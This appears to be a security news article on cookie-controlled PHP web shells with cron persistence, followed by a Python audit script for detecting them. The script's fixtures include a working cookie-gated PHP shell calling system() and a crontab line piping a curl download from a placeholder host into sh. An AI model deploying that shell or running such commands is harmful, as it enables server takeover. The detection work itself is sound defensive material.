Microsoft's Defender Security Research Team has identified a new technique where threat actors deploy PHP-based web shells on Linux servers that use HTTP cookies as a control mechanism. Instead of traditional methods using URL parameters or request bodies, these web shells rely on threat actor-supplied cookie values to gate execution, making them harder to detect through conventional monitoring.

The severity and scope of these attacks remain under investigation; Microsoft has not disclosed CVSS scores or the number of affected systems. Cookie-controlled execution represents a significant evolution in web shell techniques because it allows attackers to blend malicious commands with legitimate web traffic more effectively.

The technical mechanism involves embedding malicious PHP code that reads specific cookie values to determine whether to execute commands. This approach helps the web shells evade security tools that typically monitor URL parameters and POST data for suspicious activity. The shells can persist on compromised systems through cron jobs, ensuring continued access even after system reboots.

Mitigation strategies include implementing comprehensive web application firewalls that inspect cookie data, regularly auditing web server files for unauthorized PHP scripts, and monitoring cron job schedules for suspicious entries. Organizations should also ensure their web applications validate and sanitize all input, including cookie data.
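The two audits recommended above, looking for PHP files where a cookie value reaches a code-execution sink and looking for cron entries that resemble web shell persistence, can be scripted. The following is an added example written for this page; it is not code from Microsoft's report, and the function names, sink list, cron heuristics and the sample PHP and crontab fixtures are all constructed assumptions for illustration.

```python
"""Audit helpers for the two checks described above: flag PHP files where a cookie
value reaches a code-execution sink, and flag cron entries that look like web shell
persistence. All sample inputs below are constructed fixtures, not real artifacts."""
import re

# PHP functions that execute code or shell commands (the "sinks" we care about).
EXEC_SINKS = ("eval", "assert", "system", "exec", "shell_exec",
              "passthru", "popen", "proc_open", "create_function")
COOKIE_READ = re.compile(r"\$_COOKIE\s*\[")
SINK_CALL = re.compile(r"\b(" + "|".join(EXEC_SINKS) + r")\s*\(", re.IGNORECASE)
# Assignment of a cookie value to a variable, e.g.  $k = $_COOKIE['id'];
COOKIE_ASSIGN = re.compile(r"(\$\w+)\s*=\s*\$_COOKIE\s*\[")


def scan_php(source: str, window: int = 5) -> list:
    """Return findings where a cookie read and an execution sink occur on the same
    line, where a variable holding a cookie value reaches a sink, or where a sink
    sits within `window` lines of a cookie read (the cookie-gated pattern)."""
    findings, tainted, cookie_lines = [], set(), []
    for no, line in enumerate(source.splitlines(), 1):
        if COOKIE_READ.search(line):
            cookie_lines.append(no)
        tainted.update(COOKIE_ASSIGN.findall(line))
        m = SINK_CALL.search(line)
        if not m:
            continue
        sink = m.group(1).lower()
        reason = None
        if COOKIE_READ.search(line):
            reason = "cookie read and %s() on the same line" % sink
        elif any(re.search(re.escape(v) + r"\b", line) for v in tainted):
            reason = "variable holding a cookie value passed to %s()" % sink
        elif any(no - c <= window for c in cookie_lines):
            reason = "%s() within %d lines of a cookie read" % (sink, window)
        if reason:
            findings.append({"line": no, "sink": sink, "reason": reason})
    return findings


# Heuristics for crontab entries typical of persistence (assumed patterns).
CRON_SUSPICIOUS = (
    re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b"),    # download-and-run
    re.compile(r"\bphp\b.*(/var/www|/srv/www|/htdocs)"),  # php run against web root
    re.compile(r"\bbase64\b.*-d"),                       # decoded payload
)


def scan_crontab(text: str) -> list:
    """Return crontab lines (1-based) that match any suspicious pattern."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        for pat in CRON_SUSPICIOUS:
            if pat.search(s):
                findings.append({"line": no, "entry": s, "pattern": pat.pattern})
                break
    return findings


# Constructed fixtures: a benign cookie use and a cookie-gated execution pattern.
BENIGN_PHP = """<?php
$lang = isset($_COOKIE['lang']) ? $_COOKIE['lang'] : 'en';
$allowed = ['en', 'de', 'fr'];
if (!in_array($lang, $allowed, true)) { $lang = 'en'; }
echo "Locale: " . htmlspecialchars($lang);
"""
SUSPECT_PHP = """<?php
// constructed fixture resembling the cookie-gated pattern in the report
if (isset($_COOKIE['sid']) && $_COOKIE['sid'] === 'unlock') {
    $c = $_COOKIE['c'];
    system($c);
}
"""
SAMPLE_CRONTAB = """# constructed crontab fixture
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/bin/php /var/www/html/.cache/sess.php
* * * * * curl -s http://EXAMPLE-PLACEHOLDER/x | sh
"""

if __name__ == "__main__":
    print("benign:", scan_php(BENIGN_PHP))       # expected: []
    print("suspect:", scan_php(SUSPECT_PHP))     # expected: one finding on line 5
    print("cron:", scan_crontab(SAMPLE_CRONTAB)) # expected: lines 3 and 4
```

Run it against files under the web root (for example by reading each `*.php` file into `scan_php`) and against the output of `crontab -l` for each user plus `/etc/cron.d`. The window heuristic deliberately errs toward false positives: a cookie check a few lines before a sink is exactly the gating shape described above, and a human reviewer can quickly dismiss benign hits.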

The discovery highlights the evolving sophistication of web shell deployment techniques as attackers adapt to improved security monitoring capabilities.